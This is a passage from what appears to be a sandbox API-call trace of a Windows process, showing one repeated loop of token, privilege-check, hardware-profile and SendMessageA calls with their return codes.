pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.822] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.822] GetCurrentThread () returned 0xfffffffe [0084.822] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.822] GetLastError () returned 0x3f0 [0084.822] GetCurrentProcess () returned 0xffffffff [0084.822] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.822] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.822] SetLastError (dwErrCode=0x522) [0084.822] CloseHandle (hObject=0x114) returned 1 [0084.822] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.822] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.822] GetLastError () returned 0x578 [0084.822] SetLastError (dwErrCode=0x578) [0084.822] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.822] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.822] GetCurrentThread () returned 0xfffffffe [0084.822] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.822] GetLastError () returned 0x3f0 [0084.822] GetCurrentProcess () returned 0xffffffff [0084.822] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.822] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.822] SetLastError (dwErrCode=0x522) [0084.822] CloseHandle (hObject=0x114) returned 1 [0084.822] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.822] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.822] GetLastError () returned 0x578 [0084.822] SetLastError (dwErrCode=0x578) [0084.822] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.822] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.822] GetCurrentThread () returned 0xfffffffe [0084.822] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.822] GetLastError () returned 0x3f0 [0084.822] GetCurrentProcess () returned 0xffffffff [0084.822] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.822] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.822] SetLastError (dwErrCode=0x522) [0084.822] CloseHandle (hObject=0x114) returned 1 [0084.823] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.823] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.823] GetLastError () returned 0x578 [0084.823] SetLastError (dwErrCode=0x578) [0084.823] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.823] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.823] GetCurrentThread () returned 0xfffffffe [0084.823] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.823] GetLastError () returned 0x3f0 [0084.823] GetCurrentProcess () returned 0xffffffff [0084.823] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.823] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.823] SetLastError (dwErrCode=0x522) [0084.823] CloseHandle (hObject=0x114) returned 1 [0084.823] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.823] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.823] GetLastError () returned 0x578 [0084.823] SetLastError (dwErrCode=0x578) [0084.823] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.823] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.823] GetCurrentThread () returned 0xfffffffe [0084.823] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.823] GetLastError () returned 0x3f0 [0084.823] GetCurrentProcess () returned 0xffffffff [0084.823] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.823] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.823] SetLastError (dwErrCode=0x522) [0084.823] CloseHandle (hObject=0x114) returned 1 [0084.823] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.823] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.823] GetLastError () returned 0x578 [0084.823] SetLastError (dwErrCode=0x578) [0084.823] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.823] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.823] GetCurrentThread () returned 0xfffffffe [0084.823] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.823] GetLastError () returned 0x3f0 [0084.823] GetCurrentProcess () returned 0xffffffff [0084.823] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.823] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.823] SetLastError (dwErrCode=0x522) [0084.823] CloseHandle (hObject=0x114) returned 1 [0084.823] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.824] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.824] GetLastError () returned 0x578 [0084.824] SetLastError (dwErrCode=0x578) [0084.824] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.824] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.824] GetCurrentThread () returned 0xfffffffe [0084.824] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.824] GetLastError () returned 0x3f0 [0084.824] GetCurrentProcess () returned 0xffffffff [0084.824] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.824] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.824] SetLastError (dwErrCode=0x522) [0084.824] CloseHandle (hObject=0x114) returned 1 [0084.824] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.824] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.824] GetLastError () returned 0x578 [0084.824] SetLastError (dwErrCode=0x578) [0084.824] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.824] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.824] GetCurrentThread () returned 0xfffffffe [0084.824] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.824] GetLastError () returned 0x3f0 [0084.824] GetCurrentProcess () returned 0xffffffff [0084.824] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.824] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.824] SetLastError (dwErrCode=0x522) [0084.824] CloseHandle (hObject=0x114) returned 1 [0084.824] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.824] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.824] GetLastError () returned 0x578 [0084.824] SetLastError (dwErrCode=0x578) [0084.824] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.824] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.824] GetCurrentThread () returned 0xfffffffe [0084.824] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.825] GetLastError () returned 0x3f0 [0084.825] GetCurrentProcess () returned 0xffffffff [0084.825] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.825] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.825] SetLastError (dwErrCode=0x522) [0084.825] CloseHandle (hObject=0x114) returned 1 [0084.825] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.825] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.825] GetLastError () returned 0x578 [0084.825] SetLastError (dwErrCode=0x578) [0084.825] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.825] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.825] GetCurrentThread () returned 0xfffffffe [0084.825] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.825] GetLastError () returned 0x3f0 [0084.825] GetCurrentProcess () returned 0xffffffff [0084.825] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.825] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.825] SetLastError (dwErrCode=0x522) [0084.825] CloseHandle (hObject=0x114) returned 1 [0084.825] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.825] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.825] GetLastError () returned 0x578 [0084.825] SetLastError (dwErrCode=0x578) [0084.825] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.825] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.825] GetCurrentThread () returned 0xfffffffe [0084.825] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.825] GetLastError () returned 0x3f0 [0084.825] GetCurrentProcess () returned 0xffffffff [0084.825] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.825] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.825] SetLastError (dwErrCode=0x522) [0084.825] CloseHandle (hObject=0x114) returned 1 [0084.825] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.825] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.826] GetLastError () returned 0x578 [0084.826] SetLastError (dwErrCode=0x578) [0084.826] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.826] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.826] GetCurrentThread () returned 0xfffffffe [0084.826] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.826] GetLastError () returned 0x3f0 [0084.826] GetCurrentProcess () returned 0xffffffff [0084.826] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.826] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.826] SetLastError (dwErrCode=0x522) [0084.826] CloseHandle (hObject=0x114) returned 1 [0084.826] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.826] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.826] GetLastError () returned 0x578 [0084.826] SetLastError (dwErrCode=0x578) [0084.826] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.826] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.826] GetCurrentThread () returned 0xfffffffe [0084.826] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.826] GetLastError () returned 0x3f0 [0084.826] GetCurrentProcess () returned 0xffffffff [0084.826] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.826] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.826] SetLastError (dwErrCode=0x522) [0084.826] CloseHandle (hObject=0x114) returned 1 [0084.826] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.826] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.826] GetLastError () returned 0x578 [0084.826] SetLastError (dwErrCode=0x578) [0084.826] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.826] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.826] GetCurrentThread () returned 0xfffffffe [0084.826] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.826] GetLastError () returned 0x3f0 [0084.826] GetCurrentProcess () returned 0xffffffff [0084.826] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.826] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.826] SetLastError (dwErrCode=0x522) [0084.826] CloseHandle (hObject=0x114) returned 1 [0084.827] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.827] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.827] GetLastError () returned 0x578 [0084.827] SetLastError (dwErrCode=0x578) [0084.827] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.827] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.827] GetCurrentThread () returned 0xfffffffe [0084.827] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.827] GetLastError () returned 0x3f0 [0084.827] GetCurrentProcess () returned 0xffffffff [0084.827] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.827] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.827] SetLastError (dwErrCode=0x522) [0084.827] CloseHandle (hObject=0x114) returned 1 [0084.827] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.827] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.827] GetLastError () returned 0x578 [0084.827] SetLastError (dwErrCode=0x578) [0084.827] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.827] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.827] GetCurrentThread () returned 0xfffffffe [0084.827] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.827] GetLastError () returned 0x3f0 [0084.827] GetCurrentProcess () returned 0xffffffff [0084.827] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.827] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.827] SetLastError (dwErrCode=0x522) [0084.827] CloseHandle (hObject=0x114) returned 1 [0084.827] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.827] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.827] GetLastError () returned 0x578 [0084.827] SetLastError (dwErrCode=0x578) [0084.827] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.827] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.827] GetCurrentThread () returned 0xfffffffe [0084.827] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.827] GetLastError () returned 0x3f0 [0084.827] GetCurrentProcess () returned 0xffffffff [0084.827] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.827] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.827] SetLastError (dwErrCode=0x522) [0084.827] CloseHandle (hObject=0x114) returned 1 [0084.827] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.827] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.827] GetLastError () returned 0x578 [0084.828] SetLastError (dwErrCode=0x578) [0084.828] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.828] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.828] GetCurrentThread () returned 0xfffffffe [0084.828] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.828] GetLastError () returned 0x3f0 [0084.828] GetCurrentProcess () returned 0xffffffff [0084.828] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.828] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.828] SetLastError (dwErrCode=0x522) [0084.828] CloseHandle (hObject=0x114) returned 1 [0084.828] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.828] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.828] GetLastError () returned 0x578 [0084.828] SetLastError (dwErrCode=0x578) [0084.828] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.828] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.828] GetCurrentThread () returned 0xfffffffe [0084.828] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.828] GetLastError () returned 0x3f0 [0084.828] GetCurrentProcess () returned 0xffffffff [0084.828] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.828] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.828] SetLastError (dwErrCode=0x522) [0084.828] CloseHandle (hObject=0x114) returned 1 [0084.828] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.828] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.828] GetLastError () returned 0x578 [0084.828] SetLastError (dwErrCode=0x578) [0084.828] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.828] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.828] GetCurrentThread () returned 0xfffffffe [0084.828] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.828] GetLastError () returned 0x3f0 [0084.828] GetCurrentProcess () returned 0xffffffff [0084.828] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.828] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.828] SetLastError (dwErrCode=0x522) [0084.828] CloseHandle (hObject=0x114) returned 1 [0084.828] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.829] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.829] GetLastError () returned 0x578 [0084.829] SetLastError (dwErrCode=0x578) [0084.829] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.829] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.829] GetCurrentThread () returned 0xfffffffe [0084.829] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.829] GetLastError () returned 0x3f0 [0084.829] GetCurrentProcess () returned 0xffffffff [0084.829] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.829] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.829] SetLastError (dwErrCode=0x522) [0084.829] CloseHandle (hObject=0x114) returned 1 [0084.829] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.829] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.829] GetLastError () returned 0x578 [0084.829] SetLastError (dwErrCode=0x578) [0084.829] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.829] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.829] GetCurrentThread () returned 0xfffffffe [0084.829] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, 